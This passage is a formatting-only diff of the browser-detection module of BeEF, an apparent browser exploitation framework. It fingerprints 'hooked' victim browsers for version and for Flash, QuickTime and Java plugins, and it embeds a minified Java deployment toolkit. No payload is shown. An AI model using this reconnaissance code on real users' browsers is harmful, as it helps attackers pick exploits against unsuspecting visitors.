-	 * Returns true if Opera.
-	 * @example: beef.browser.isO()
-	 */
-	isO: function() {
-		return this.isO9_52() || this.isO9_60() || this.isO10() || this.isO11() || this.isO12();
-	},
+    /**
+     * Returns true if Opera.
+     * @example: beef.browser.isO()
+     */
+    isO:function () {
+        return this.isO9_52() || this.isO9_60() || this.isO10() || this.isO11() || this.isO12();
+    },
 
-	/**
-	 * Returns the type of browser being used.
-	 * @example: beef.browser.type().IE6
-	 * @example: beef.browser.type().FF
-	 * @example: beef.browser.type().O
-	 */
-	type: function() {
+    /**
+     * Returns the type of browser being used.
+     * @example: beef.browser.type().IE6
+     * @example: beef.browser.type().FF
+     * @example: beef.browser.type().O
+     */
+    type:function () {
 
-		return {
-			C5:	this.isC5(), 	// Chrome 5
-			C6:	this.isC6(), 	// Chrome 6
-			C7:	this.isC7(), 	// Chrome 7
-			C8:	this.isC8(), 	// Chrome 8
-			C9:	this.isC9(), 	// Chrome 9
-			C10:	this.isC10(), 	// Chrome 10
-			C11:	this.isC11(), 	// Chrome 11
-			C12:	this.isC12(), 	// Chrome 12
-			C13:	this.isC13(),	// Chrome 13
-			C14:	this.isC14(),	// Chrome 14
-			C15:    this.isC15(),   // Chrome 15
-			C16:	this.isC16(),	// Chrome 16
-			C17:	this.isC17(),	// Chrome 17
-			C18:	this.isC18(),	// Chrome 18
-			C19:	this.isC19(),	// Chrome 19
-			C20:	this.isC20(),	// Chrome 20
-			C21:	this.isC21(),	// Chrome 21
-			C22:	this.isC22(),	// Chrome 22
-            C23:	this.isC23(),	// Chrome 23
-            C24:	this.isC24(),	// Chrome 24
-			C:	this.isC(), 	// Chrome any version
+        return {
+            C5:this.isC5(), // Chrome 5
+            C6:this.isC6(), // Chrome 6
+            C7:this.isC7(), // Chrome 7
+            C8:this.isC8(), // Chrome 8
+            C9:this.isC9(), // Chrome 9
+            C10:this.isC10(), // Chrome 10
+            C11:this.isC11(), // Chrome 11
+            C12:this.isC12(), // Chrome 12
+            C13:this.isC13(), // Chrome 13
+            C14:this.isC14(), // Chrome 14
+            C15:this.isC15(), // Chrome 15
+            C16:this.isC16(), // Chrome 16
+            C17:this.isC17(), // Chrome 17
+            C18:this.isC18(), // Chrome 18
+            C19:this.isC19(), // Chrome 19
+            C20:this.isC20(), // Chrome 20
+            C21:this.isC21(), // Chrome 21
+            C22:this.isC22(), // Chrome 22
+            C23:this.isC23(), // Chrome 23
+            C24:this.isC24(), // Chrome 24
+            C:this.isC(), // Chrome any version
 
-			FF2:	this.isFF2(),	// Firefox 2
-			FF3:	this.isFF3(),	// Firefox 3
-			FF3_5:	this.isFF3_5(),	// Firefox 3.5
-			FF3_6:	this.isFF3_6(),	// Firefox 3.6
-			FF4:	this.isFF4(),   // Firefox 4
-			FF5:	this.isFF5(),	// Firefox 5
-			FF6:	this.isFF6(),	// Firefox 6
-			FF7:	this.isFF7(),	// Firefox 7
-			FF8:	this.isFF8(),	// Firefox 8
-			FF9:	this.isFF9(),	// Firefox 9
-			FF10:	this.isFF10(),	// Firefox 10
-			FF11:	this.isFF11(),	// Firefox 11
-			FF12:	this.isFF12(),	// Firefox 12
-			FF13:	this.isFF13(),	// Firefox 13
-			FF14:	this.isFF14(),	// Firefox 14
-			FF15:	this.isFF15(),	// Firefox 15
-			FF16:	this.isFF16(),	// Firefox 16
-			FF17:	this.isFF17(),	// Firefox 17
-			FF18:	this.isFF18(),	// Firefox 18
-			FF19:	this.isFF19(),	// Firefox 19
-			FF:	this.isFF(),	// Firefox any version
+            FF2:this.isFF2(), // Firefox 2
+            FF3:this.isFF3(), // Firefox 3
+            FF3_5:this.isFF3_5(), // Firefox 3.5
+            FF3_6:this.isFF3_6(), // Firefox 3.6
+            FF4:this.isFF4(), // Firefox 4
+            FF5:this.isFF5(), // Firefox 5
+            FF6:this.isFF6(), // Firefox 6
+            FF7:this.isFF7(), // Firefox 7
+            FF8:this.isFF8(), // Firefox 8
+            FF9:this.isFF9(), // Firefox 9
+            FF10:this.isFF10(), // Firefox 10
+            FF11:this.isFF11(), // Firefox 11
+            FF12:this.isFF12(), // Firefox 12
+            FF13:this.isFF13(), // Firefox 13
+            FF14:this.isFF14(), // Firefox 14
+            FF15:this.isFF15(), // Firefox 15
+            FF16:this.isFF16(), // Firefox 16
+            FF17:this.isFF17(), // Firefox 17
+            FF18:this.isFF18(), // Firefox 18
+            FF19:this.isFF19(), // Firefox 19
+            FF:this.isFF(), // Firefox any version
 
-			IE6:	this.isIE6(),	// Internet Explorer 6
-			IE7:	this.isIE7(),	// Internet Explorer 7
-			IE8:	this.isIE8(),	// Internet Explorer 8
-			IE9:	this.isIE9(),	// Internet Explorer 9
-			IE10:	this.isIE10(),	// Internet Explorer 10
-			IE:	this.isIE(),	// Internet Explorer any version
+            IE6:this.isIE6(), // Internet Explorer 6
+            IE7:this.isIE7(), // Internet Explorer 7
+            IE8:this.isIE8(), // Internet Explorer 8
+            IE9:this.isIE9(), // Internet Explorer 9
+            IE10:this.isIE10(), // Internet Explorer 10
+            IE:this.isIE(), // Internet Explorer any version
 
-			O9_52:  this.isO9_52(), // Opera 9.50 through 9.52
-			O9_60:  this.isO9_60(), // Opera 9.60 through 9.64
-			O10:    this.isO10(),  	// Opera 10.xx
-			O11:    this.isO11(),  	// Opera 11.xx
-			O12:    this.isO12(),  	// Opera 11.xx
-			O:      this.isO(), 	// Opera any version
+            O9_52:this.isO9_52(), // Opera 9.50 through 9.52
+            O9_60:this.isO9_60(), // Opera 9.60 through 9.64
+            O10:this.isO10(), // Opera 10.xx
+            O11:this.isO11(), // Opera 11.xx
+            O12:this.isO12(), // Opera 11.xx
+            O:this.isO(), // Opera any version
 
-			S4:	this.isS4(),	// Safari 4.xx
-			S5:	this.isS5(),	// Safari 5.xx
-			S6:	this.isS6(),	// Safari 6.x
-			S:	this.isS()	// Safari any version
-		}
-	},
+            S4:this.isS4(), // Safari 4.xx
+            S5:this.isS5(), // Safari 5.xx
+            S6:this.isS6(), // Safari 6.x
+            S:this.isS()    // Safari any version
+        }
+    },
 
-	/**
-	 * Returns the type of browser being used.
-	 * @return: {String} User agent software and version.
-	 *
-	 * @example: beef.browser.getBrowserVersion()
-	 */
-	getBrowserVersion: function() {
+    /**
+     * Returns the type of browser being used.
+     * @return: {String} User agent software and version.
+     *
+     * @example: beef.browser.getBrowserVersion()
+     */
+    getBrowserVersion:function () {
 
-		if (this.isC5())	{ return '5'  }; 	// Chrome 5
-		if (this.isC6())	{ return '6'  }; 	// Chrome 6
-		if (this.isC7())	{ return '7'  }; 	// Chrome 7
-		if (this.isC8())	{ return '8'  }; 	// Chrome 8
-		if (this.isC9())	{ return '9'  }; 	// Chrome 9
-		if (this.isC10())	{ return '10' }; 	// Chrome 10
-		if (this.isC11())	{ return '11' }; 	// Chrome 11
-		if (this.isC12())	{ return '12' }; 	// Chrome 12
-		if (this.isC13())	{ return '13' }; 	// Chrome 13
-		if (this.isC14())	{ return '14' }; 	// Chrome 14
-		if (this.isC15())	{ return '15' }; 	// Chrome 15
-		if (this.isC16())	{ return '16' };	// Chrome 16
-		if (this.isC17())	{ return '17' };	// Chrome 17
-		if (this.isC18())	{ return '18' };	// Chrome 18
-		if (this.isC19())	{ return '19' };	// Chrome 19
-		if (this.isC20())	{ return '20' };	// Chrome 20
-		if (this.isC21())	{ return '21' };	// Chrome 21
-		if (this.isC22())   { return '22' };    // Chrome 22
-        if (this.isC23())   { return '23' };    // Chrome 23
-        if (this.isC24())   { return '24' };    // Chrome 24
+        if (this.isC5()) {
+            return '5'
+        }
+        ; 	// Chrome 5
+        if (this.isC6()) {
+            return '6'
+        }
+        ; 	// Chrome 6
+        if (this.isC7()) {
+            return '7'
+        }
+        ; 	// Chrome 7
+        if (this.isC8()) {
+            return '8'
+        }
+        ; 	// Chrome 8
+        if (this.isC9()) {
+            return '9'
+        }
+        ; 	// Chrome 9
+        if (this.isC10()) {
+            return '10'
+        }
+        ; 	// Chrome 10
+        if (this.isC11()) {
+            return '11'
+        }
+        ; 	// Chrome 11
+        if (this.isC12()) {
+            return '12'
+        }
+        ; 	// Chrome 12
+        if (this.isC13()) {
+            return '13'
+        }
+        ; 	// Chrome 13
+        if (this.isC14()) {
+            return '14'
+        }
+        ; 	// Chrome 14
+        if (this.isC15()) {
+            return '15'
+        }
+        ; 	// Chrome 15
+        if (this.isC16()) {
+            return '16'
+        }
+        ;	// Chrome 16
+        if (this.isC17()) {
+            return '17'
+        }
+        ;	// Chrome 17
+        if (this.isC18()) {
+            return '18'
+        }
+        ;	// Chrome 18
+        if (this.isC19()) {
+            return '19'
+        }
+        ;	// Chrome 19
+        if (this.isC20()) {
+            return '20'
+        }
+        ;	// Chrome 20
+        if (this.isC21()) {
+            return '21'
+        }
+        ;	// Chrome 21
+        if (this.isC22()) {
+            return '22'
+        }
+        ;    // Chrome 22
+        if (this.isC23()) {
+            return '23'
+        }
+        ;    // Chrome 23
+        if (this.isC24()) {
+            return '24'
+        }
+        ;    // Chrome 24
 
-        if (this.isFF2())	{ return '2'  };	// Firefox 2
-		if (this.isFF3())	{ return '3'  };	// Firefox 3
-		if (this.isFF3_5())	{ return '3.5'};	// Firefox 3.5
-		if (this.isFF3_6())	{ return '3.6'};	// Firefox 3.6
-		if (this.isFF4())	{ return '4'  };	// Firefox 4
-		if (this.isFF5())	{ return '5'  };	// Firefox 5
-		if (this.isFF6())	{ return '6'  };	// Firefox 6
-		if (this.isFF7())	{ return '7'  };	// Firefox 7
-		if (this.isFF8())	{ return '8'  };	// Firefox 8
-		if (this.isFF9())	{ return '9'  };	// Firefox 9
-		if (this.isFF10())	{ return '10' };	// Firefox 10
-		if (this.isFF11())	{ return '11' };	// Firefox 11
-		if (this.isFF12())	{ return '12' };	// Firefox 12
-		if (this.isFF13())	{ return '13' };	// Firefox 13
-		if (this.isFF14())	{ return '14' };	// Firefox 14
-		if (this.isFF15())	{ return '15' };	// Firefox 15
-		if (this.isFF16())	{ return '16' };	// Firefox 16
-		if (this.isFF17())  { return '17' };    // Firefox 17
-		if (this.isFF18())  { return '18' };    // Firefox 18
-		if (this.isFF19())  { return '19' };    // Firefox 19
+        if (this.isFF2()) {
+            return '2'
+        }
+        ;	// Firefox 2
+        if (this.isFF3()) {
+            return '3'
+        }
+        ;	// Firefox 3
+        if (this.isFF3_5()) {
+            return '3.5'
+        }
+        ;	// Firefox 3.5
+        if (this.isFF3_6()) {
+            return '3.6'
+        }
+        ;	// Firefox 3.6
+        if (this.isFF4()) {
+            return '4'
+        }
+        ;	// Firefox 4
+        if (this.isFF5()) {
+            return '5'
+        }
+        ;	// Firefox 5
+        if (this.isFF6()) {
+            return '6'
+        }
+        ;	// Firefox 6
+        if (this.isFF7()) {
+            return '7'
+        }
+        ;	// Firefox 7
+        if (this.isFF8()) {
+            return '8'
+        }
+        ;	// Firefox 8
+        if (this.isFF9()) {
+            return '9'
+        }
+        ;	// Firefox 9
+        if (this.isFF10()) {
+            return '10'
+        }
+        ;	// Firefox 10
+        if (this.isFF11()) {
+            return '11'
+        }
+        ;	// Firefox 11
+        if (this.isFF12()) {
+            return '12'
+        }
+        ;	// Firefox 12
+        if (this.isFF13()) {
+            return '13'
+        }
+        ;	// Firefox 13
+        if (this.isFF14()) {
+            return '14'
+        }
+        ;	// Firefox 14
+        if (this.isFF15()) {
+            return '15'
+        }
+        ;	// Firefox 15
+        if (this.isFF16()) {
+            return '16'
+        }
+        ;	// Firefox 16
+        if (this.isFF17()) {
+            return '17'
+        }
+        ;    // Firefox 17
+        if (this.isFF18()) {
+            return '18'
+        }
+        ;    // Firefox 18
+        if (this.isFF19()) {
+            return '19'
+        }
+        ;    // Firefox 19
 
-		if (this.isIE6())	{ return '6'  };	// Internet Explorer 6
-		if (this.isIE7())	{ return '7'  };	// Internet Explorer 7
-		if (this.isIE8())	{ return '8'  };	// Internet Explorer 8
-		if (this.isIE9())	{ return '9'  };	// Internet Explorer 9
-		if (this.isIE10())	{ return '10' };	// Internet Explorer 10
+        if (this.isIE6()) {
+            return '6'
+        }
+        ;	// Internet Explorer 6
+        if (this.isIE7()) {
+            return '7'
+        }
+        ;	// Internet Explorer 7
+        if (this.isIE8()) {
+            return '8'
+        }
+        ;	// Internet Explorer 8
+        if (this.isIE9()) {
+            return '9'
+        }
+        ;	// Internet Explorer 9
+        if (this.isIE10()) {
+            return '10'
+        }
+        ;	// Internet Explorer 10
 
-		if (this.isS4())	{ return '4'  };	// Safari 4
-		if (this.isS5())	{ return '5'  };	// Safari 5
-		if (this.isS6())	{ return '6'  };	// Safari 6
+        if (this.isS4()) {
+            return '4'
+        }
+        ;	// Safari 4
+        if (this.isS5()) {
+            return '5'
+        }
+        ;	// Safari 5
+        if (this.isS6()) {
+            return '6'
+        }
+        ;	// Safari 6
 
-		if (this.isO9_52())	{ return '9.5'};	// Opera 9.5x
-		if (this.isO9_60())	{ return '9.6'};	// Opera 9.6
-		if (this.isO10())	{ return '10' };	// Opera 10.xx
-		if (this.isO11())	{ return '11' };	// Opera 11.xx
-		if (this.isO12())	{ return '12' };	// Opera 12.xx
+        if (this.isO9_52()) {
+            return '9.5'
+        }
+        ;	// Opera 9.5x
+        if (this.isO9_60()) {
+            return '9.6'
+        }
+        ;	// Opera 9.6
+        if (this.isO10()) {
+            return '10'
+        }
+        ;	// Opera 10.xx
+        if (this.isO11()) {
+            return '11'
+        }
+        ;	// Opera 11.xx
+        if (this.isO12()) {
+            return '12'
+        }
+        ;	// Opera 12.xx
 
-		return 'UNKNOWN';				// Unknown UA
-	},
+        return 'UNKNOWN';				// Unknown UA
+    },
 
-	/**
-	 * Returns the type of user agent by hooked browser.
-	 * @return: {String} User agent software.
-	 *
-	 * @example: beef.browser.getBrowserName()
-	 */
-	getBrowserName: function() {
+    /**
+     * Returns the type of user agent by hooked browser.
+     * @return: {String} User agent software.
+     *
+     * @example: beef.browser.getBrowserName()
+     */
+    getBrowserName:function () {
 
-		if (this.isC())		{ return 'C' }; 	// Chrome any version
-		if (this.isFF())	{ return 'FF'};		// Firefox any version
-		if (this.isIE())	{ return 'IE'};		// Internet Explorer any version
-		if (this.isO())		{ return 'O' };		// Opera any version
-		if (this.isS())		{ return 'S' };		// Safari any version
-		return 'UNKNOWN';					// Unknown UA
-	},
+        if (this.isC()) {
+            return 'C'
+        }
+        ; 	// Chrome any version
+        if (this.isFF()) {
+            return 'FF'
+        }
+        ;		// Firefox any version
+        if (this.isIE()) {
+            return 'IE'
+        }
+        ;		// Internet Explorer any version
+        if (this.isO()) {
+            return 'O'
+        }
+        ;		// Opera any version
+        if (this.isS()) {
+            return 'S'
+        }
+        ;		// Safari any version
+        return 'UNKNOWN';					// Unknown UA
+    },
 
-	/**
-	 * Checks if the zombie has flash installed and enabled.
-	 * @return: {Boolean} true or false.
-	 *
-	 * @example: if(beef.browser.hasFlash()) { ... }
-	 */
-	hasFlash: function() {
-		if (!this.type().IE) {
-			return (navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"]);
-		} else {
-			flash_versions = 11;
-			flash_installed = false;
+    /**
+     * Checks if the zombie has flash installed and enabled.
+     * @return: {Boolean} true or false.
+     *
+     * @example: if(beef.browser.hasFlash()) { ... }
+     */
+    hasFlash:function () {
+        if (!this.type().IE) {
+            return (navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"]);
+        } else {
+            flash_versions = 11;
+            flash_installed = false;
 
-			if (window.ActiveXObject) {
-				for (x = 2; x <= flash_versions; x++) {
-					try {
-						Flash = eval("new ActiveXObject('ShockwaveFlash.ShockwaveFlash." + x + "');");
-						if (Flash) {
-							flash_installed = true;
-						}
-					}
-					catch(e) { }
-				}
-			};
-			return flash_installed;
-		}
-	},
+            if (window.ActiveXObject) {
+                for (x = 2; x <= flash_versions; x++) {
+                    try {
+                        Flash = eval("new ActiveXObject('ShockwaveFlash.ShockwaveFlash." + x + "');");
+                        if (Flash) {
+                            flash_installed = true;
+                        }
+                    }
+                    catch (e) {
+                    }
+                }
+            }
+            ;
+            return flash_installed;
+        }
+    },
 
-	/**
-	 * Checks if the zombie has the QuickTime plugin installed.
-	 * @return: {Boolean} true or false.
-	 *
-	 * @example: if ( beef.browser.hasQuickTime() ) { ... }
-	 */
-	hasQuickTime: function() {
-		
-		var quicktime = false;
-		
-		// Not Internet Explorer
-		if ( !this.type().IE ) {
-			
-			for ( i=0; i < navigator.plugins.length; i++ ) {
-				
-				if ( navigator.plugins[i].name.indexOf("QuickTime") >= 0 ) {
-					quicktime = true;
-				}
-				
-			}
-		
-		// Internet Explorer
-		} else {
-			
-			try {
-				
-				var qt_test = new ActiveXObject('QuickTime.QuickTime');
-				
-			} catch (e) { }
-			
-			if ( qt_test ) { quicktime = true; }
-			
-		}
-		
-		return quicktime;
-		
-	},
+    /**
+     * Checks if the zombie has the QuickTime plugin installed.
+     * @return: {Boolean} true or false.
+     *
+     * @example: if ( beef.browser.hasQuickTime() ) { ... }
+     */
+    hasQuickTime:function () {
 
-	/**
-	 * Checks if the zombie has Java enabled.
- 	 * @return: {Boolean} true or false.
-	 *
-	 * @example: if(beef.browser.javaEnabled()) { ... }
-	 */
-	javaEnabled: function() {
+        var quicktime = false;
 
-        if(!this.isIE())
-        {
+        // Not Internet Explorer
+        if (!this.type().IE) {
+
+            for (i = 0; i < navigator.plugins.length; i++) {
+
+                if (navigator.plugins[i].name.indexOf("QuickTime") >= 0) {
+                    quicktime = true;
+                }
+
+            }
+
+            // Internet Explorer
+        } else {
+
+            try {
+
+                var qt_test = new ActiveXObject('QuickTime.QuickTime');
+
+            } catch (e) {
+            }
+
+            if (qt_test) {
+                quicktime = true;
+            }
+
+        }
+
+        return quicktime;
+
+    },
+
+    /**
+     * Checks if the zombie has Java enabled.
+     * @return: {Boolean} true or false.
+     *
+     * @example: if(beef.browser.javaEnabled()) { ... }
+     */
+    javaEnabled:function () {
+
+        if (!this.isIE()) {
 
             // Cross-browser Java Deployment Toolkit Script
             // Source: http://java.com/js/deployJava.js
-            deployJava=function(){var l={core:["id","class","title","style"],i18n:["lang","dir"],events:["onclick","ondblclick","onmousedown","onmouseup","onmouseover","onmousemove","onmouseout","onkeypress","onkeydown","onkeyup"],applet:["codebase","code","name","archive","object","width","height","alt","align","hspace","vspace"],object:["classid","codebase","codetype","data","type","archive","declare","standby","height","width","usemap","name","tabindex","align","border","hspace","vspace"]};var b=l.object.concat(l.core,l.i18n,l.events);var m=l.applet.concat(l.core);function g(n){if(!d.debug){return}if(console.log){console.log(n)}else{alert(n)}}function k(o,n){if(o==null||o.length==0){return true}var q=o.charAt(o.length-1);if(q!="+"&&q!="*"&&(o.indexOf("_")!=-1&&q!="_")){o=o+"*";q="*"}o=o.substring(0,o.length-1);if(o.length>0){var p=o.charAt(o.length-1);if(p=="."||p=="_"){o=o.substring(0,o.length-1)}}if(q=="*"){return(n.indexOf(o)==0)}else{if(q=="+"){return o<=n}}return false}function e(){var n="//java.com/js/webstart.png";try{return document.location.protocol.indexOf("http")!=-1?n:"http:"+n}catch(o){return"http:"+n}}function j(p,o){var n=p.length;for(var q=0;q<n;q++){if(p[q]===o){return true}}return false}function c(n){return j(m,n.toLowerCase())}function i(n){return j(b,n.toLowerCase())}function a(n){if("MSIE"!=deployJava.browserName){return true}if(deployJava.compareVersionToPattern(deployJava.getPlugin().version,["10","0","0"],false,true)){return true}if(n==null){return false}return !k("1.6.0_33+",n)}var d={debug:null,version:"20120801",firefoxJavaVersion:null,myInterval:null,preInstallJREList:null,returnPage:null,brand:null,locale:null,installType:null,EAInstallEnabled:false,EarlyAccessURL:null,getJavaURL:"http://jdl.sun.com/webapps/getjava/BrowserRedirect?host=java.com",oldMimeType:"application/npruntime-scriptable-plugin;DeploymentToolkit",mimeType:"application/java-deployment-toolkit",launchButtonPNG:e(),browserName:null,browserName2:null,getJREs:function(){var r=new Array();if(this.isPluginInstalled()){var q=this.getPlugin();var n=q.jvms;for(var p=0;p<n.getLength();p++){r[p]=n.get(p).version}}else{var o=this.getBrowser();if(o=="MSIE"){if(this.testUsingActiveX("1.7.0")){r[0]="1.7.0"}else{if(this.testUsingActiveX("1.6.0")){r[0]="1.6.0"}else{if(this.testUsingActiveX("1.5.0")){r[0]="1.5.0"}else{if(this.testUsingActiveX("1.4.2")){r[0]="1.4.2"}else{if(this.testForMSVM()){r[0]="1.1"}}}}}}else{if(o=="Netscape Family"){this.getJPIVersionUsingMimeType();if(this.firefoxJavaVersion!=null){r[0]=this.firefoxJavaVersion}else{if(this.testUsingMimeTypes("1.7")){r[0]="1.7.0"}else{if(this.testUsingMimeTypes("1.6")){r[0]="1.6.0"}else{if(this.testUsingMimeTypes("1.5")){r[0]="1.5.0"}else{if(this.testUsingMimeTypes("1.4.2")){r[0]="1.4.2"}else{if(this.browserName2=="Safari"){if(this.testUsingPluginsArray("1.7.0")){r[0]="1.7.0"}else{if(this.testUsingPluginsArray("1.6")){r[0]="1.6.0"}else{if(this.testUsingPluginsArray("1.5")){r[0]="1.5.0"}else{if(this.testUsingPluginsArray("1.4.2")){r[0]="1.4.2"}}}}}}}}}}}}}if(this.debug){for(var p=0;p<r.length;++p){g("[getJREs()] We claim to have detected Java SE "+r[p])}}return r},installJRE:function(q,o){var n=false;if(this.isPluginInstalled()&&this.isAutoInstallEnabled(q)){var p=false;if(this.isCallbackSupported()){p=this.getPlugin().installJRE(q,o)}else{p=this.getPlugin().installJRE(q)}if(p){this.refresh();if(this.returnPage!=null){document.location=this.returnPage}}return p}else{return this.installLatestJRE()}},isAutoInstallEnabled:function(n){if(!this.isPluginInstalled()){return false}if(typeof n=="undefined"){n=null}return a(n)},isCallbackSupported:function(){return this.isPluginInstalled()&&this.compareVersionToPattern(this.getPlugin().version,["10","2","0"],false,true)},installLatestJRE:function(p){if(this.isPluginInstalled()&&this.isAutoInstallEnabled()){var q=false;if(this.isCallbackSupported()){q=this.getPlugin().installLatestJRE(p)}else{q=this.getPlugin().installLatestJRE()}if(q){this.refresh();if(this.returnPage!=null){document.location=this.returnPage}}return q}else{var o=this.getBrowser();var n=navigator.platform.toLowerCase();if((this.EAInstallEnabled=="true")&&(n.indexOf("win")!=-1)&&(this.EarlyAccessURL!=null)){this.preInstallJREList=this.getJREs();if(this.returnPage!=null){this.myInterval=setInterval("deployJava.poll()",3000)}location.href=this.EarlyAccessURL;return false}else{if(o=="MSIE"){return this.IEInstall()}else{if((o=="Netscape Family")&&(n.indexOf("win32")!=-1)){return this.FFInstall()}else{location.href=this.getJavaURL+((this.returnPage!=null)?("&returnPage="+this.returnPage):"")+((this.locale!=null)?("&locale="+this.locale):"")+((this.brand!=null)?("&brand="+this.brand):"")}}return false}}},runApplet:function(o,t,q){if(q=="undefined"||q==null){q="1.1"}var r="^(\\d+)(?:\\.(\\d+)(?:\\.(\\d+)(?:_(\\d+))?)?)?$";var n=q.match(r);if(this.returnPage==null){this.returnPage=document.location}if(n!=null){var p=this.getBrowser();if(p!="?"){if(this.versionCheck(q+"+")){this.writeAppletTag(o,t)}else{if(this.installJRE(q+"+")){this.refresh();location.href=document.location;this.writeAppletTag(o,t)}}}else{this.writeAppletTag(o,t)}}else{g("[runApplet()] Invalid minimumVersion argument to runApplet():"+q)}},writeAppletTag:function(q,v){var n="<applet ";var p="";var r="</applet>";var w=true;if(null==v||typeof v!="object"){v=new Object()}for(var o in q){if(!c(o)){v[o]=q[o]}else{n+=(" "+o+'="'+q[o]+'"');if(o=="code"){w=false}}}var u=false;for(var t in v){if(t=="codebase_lookup"){u=true}if(t=="object"||t=="java_object"||t=="java_code"){w=false}p+='<param name="'+t+'" value="'+v[t]+'"/>'}if(!u){p+='<param name="codebase_lookup" value="false"/>'}if(w){n+=(' code="dummy"')}n+=">";document.write(n+"\n"+p+"\n"+r)},versionCheck:function(o){var u=0;var w="^(\\d+)(?:\\.(\\d+)(?:\\.(\\d+)(?:_(\\d+))?)?)?(\\*|\\+)?$";var x=o.match(w);if(x!=null){var q=false;var t=false;var p=new Array();for(var r=1;r<x.length;++r){if((typeof x[r]=="string")&&(x[r]!="")){p[u]=x[r];u++}}if(p[p.length-1]=="+"){t=true;q=false;p.length--}else{if(p[p.length-1]=="*"){t=false;q=true;p.length--}else{if(p.length<4){t=false;q=true}}}var v=this.getJREs();for(var r=0;r<v.length;++r){if(this.compareVersionToPattern(v[r],p,q,t)){return true}}return false}else{var n="Invalid versionPattern passed to versionCheck: "+o;g("[versionCheck()] "+n);alert(n);return false}},isWebStartInstalled:function(q){var p=this.getBrowser();if(p=="?"){return true}if(q=="undefined"||q==null){q="1.4.2"}var o=false;var r="^(\\d+)(?:\\.(\\d+)(?:\\.(\\d+)(?:_(\\d+))?)?)?$";var n=q.match(r);if(n!=null){o=this.versionCheck(q+"+")}else{g("[isWebStartInstaller()] Invalid minimumVersion argument to isWebStartInstalled(): "+q);o=this.versionCheck("1.4.2+")}return o},getJPIVersionUsingMimeType:function(){for(var o=0;o<navigator.mimeTypes.length;++o){var p=navigator.mimeTypes[o].type;var n=p.match(/^application\/x-java-applet;jpi-version=(.*)$/);if(n!=null){this.firefoxJavaVersion=n[1];if("Opera"!=this.browserName2){break}}}},launchWebStartApplication:function(q){var n=navigator.userAgent.toLowerCase();this.getJPIVersionUsingMimeType();if(this.isWebStartInstalled("1.7.0")==false){if((this.installJRE("1.7.0+")==false)||((this.isWebStartInstalled("1.7.0")==false))){return false}}var t=null;if(document.documentURI){t=document.documentURI}if(t==null){t=document.URL}var o=this.getBrowser();var p;if(o=="MSIE"){p='<object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" width="0" height="0"><PARAM name="launchjnlp" value="'+q+'"><PARAM name="docbase" value="'+t+'"></object>'}else{if(o=="Netscape Family"){p='<embed type="application/x-java-applet;jpi-version='+this.firefoxJavaVersion+'" width="0" height="0" launchjnlp="'+q+'"docbase="'+t+'" />'}}if(document.body=="undefined"||document.body==null){document.write(p);document.location=t}else{var r=document.createElement("div");r.id="div1";r.style.position="relative";r.style.left="-10000px";r.style.margin="0px auto";r.className="dynamicDiv";r.innerHTML=p;document.body.appendChild(r)}},createWebStartLaunchButtonEx:function(p,o){if(this.returnPage==null){this.returnPage=p}var n="javascript:deployJava.launchWebStartApplication('"+p+"');";document.write('<a href="'+n+'" onMouseOver="window.status=\'\'; return true;"><img src="'+this.launchButtonPNG+'" border="0" /></a>')},createWebStartLaunchButton:function(p,o){if(this.returnPage==null){this.returnPage=p}var n="javascript:if (!deployJava.isWebStartInstalled(&quot;"+o+"&quot;)) {if (deployJava.installLatestJRE()) {if (deployJava.launch(&quot;"+p+"&quot;)) {}}} else {if (deployJava.launch(&quot;"+p+"&quot;)) {}}";document.write('<a href="'+n+'" onMouseOver="window.status=\'\'; return true;"><img src="'+this.launchButtonPNG+'" border="0" /></a>')},launch:function(n){document.location=n;return true},isPluginInstalled:function(){var n=this.getPlugin();if(n&&n.jvms){return true}else{return false}},isAutoUpdateEnabled:function(){if(this.isPluginInstalled()){return this.getPlugin().isAutoUpdateEnabled()}return false},setAutoUpdateEnabled:function(){if(this.isPluginInstalled()){return this.getPlugin().setAutoUpdateEnabled()}return false},setInstallerType:function(n){this.installType=n;if(this.isPluginInstalled()){return this.getPlugin().setInstallerType(n)}return false},setAdditionalPackages:function(n){if(this.isPluginInstalled()){return this.getPlugin().setAdditionalPackages(n)}return false},setEarlyAccess:function(n){this.EAInstallEnabled=n},isPlugin2:function(){if(this.isPluginInstalled()){if(this.versionCheck("1.6.0_10+")){try{return this.getPlugin().isPlugin2()}catch(n){}}}return false},allowPlugin:function(){this.getBrowser();var n=("Safari"!=this.browserName2&&"Opera"!=this.browserName2);return n},getPlugin:function(){this.refresh();var n=null;if(this.allowPlugin()){n=document.getElementById("deployJavaPlugin")}return n},compareVersionToPattern:function(u,o,q,r){if(u==undefined||o==undefined){return false}var v="^(\\d+)(?:\\.(\\d+)(?:\\.(\\d+)(?:_(\\d+))?)?)?$";var w=u.match(v);if(w!=null){var t=0;var x=new Array();for(var p=1;p<w.length;++p){if((typeof w[p]=="string")&&(w[p]!="")){x[t]=w[p];t++}}var n=Math.min(x.length,o.length);if(r){for(var p=0;p<n;++p){if(x[p]<o[p]){return false}else{if(x[p]>o[p]){return true}}}return true}else{for(var p=0;p<n;++p){if(x[p]!=o[p]){return false}}if(q){return true}else{return(x.length==o.length)}}}else{return false}},getBrowser:function(){if(this.browserName==null){var n=navigator.userAgent.toLowerCase();g("[getBrowser()] navigator.userAgent.toLowerCase() -> "+n);if((n.indexOf("msie")!=-1)&&(n.indexOf("opera")==-1)){this.browserName="MSIE";this.browserName2="MSIE"}else{if(n.indexOf("iphone")!=-1){this.browserName="Netscape Family";this.browserName2="iPhone"}else{if((n.indexOf("firefox")!=-1)&&(n.indexOf("opera")==-1)){this.browserName="Netscape Family";this.browserName2="Firefox"}else{if(n.indexOf("chrome")!=-1){this.browserName="Netscape Family";this.browserName2="Chrome"}else{if(n.indexOf("safari")!=-1){this.browserName="Netscape Family";this.browserName2="Safari"}else{if((n.indexOf("mozilla")!=-1)&&(n.indexOf("opera")==-1)){this.browserName="Netscape Family";this.browserName2="Other"}else{if(n.indexOf("opera")!=-1){this.browserName="Netscape Family";this.browserName2="Opera"}else{this.browserName="?";this.browserName2="unknown"}}}}}}}g("[getBrowser()] Detected browser name:"+this.browserName+", "+this.browserName2)}return this.browserName},testUsingActiveX:function(n){var p="JavaWebStart.isInstalled."+n+".0";if(typeof ActiveXObject=="undefined"||!ActiveXObject){g("[testUsingActiveX()] Browser claims to be IE, but no ActiveXObject object?");return false}try{return(new ActiveXObject(p)!=null)}catch(o){return false}},testForMSVM:function(){var o="{08B0E5C0-4FCB-11CF-AAA5-00401C608500}";if(typeof oClientCaps!="undefined"){var 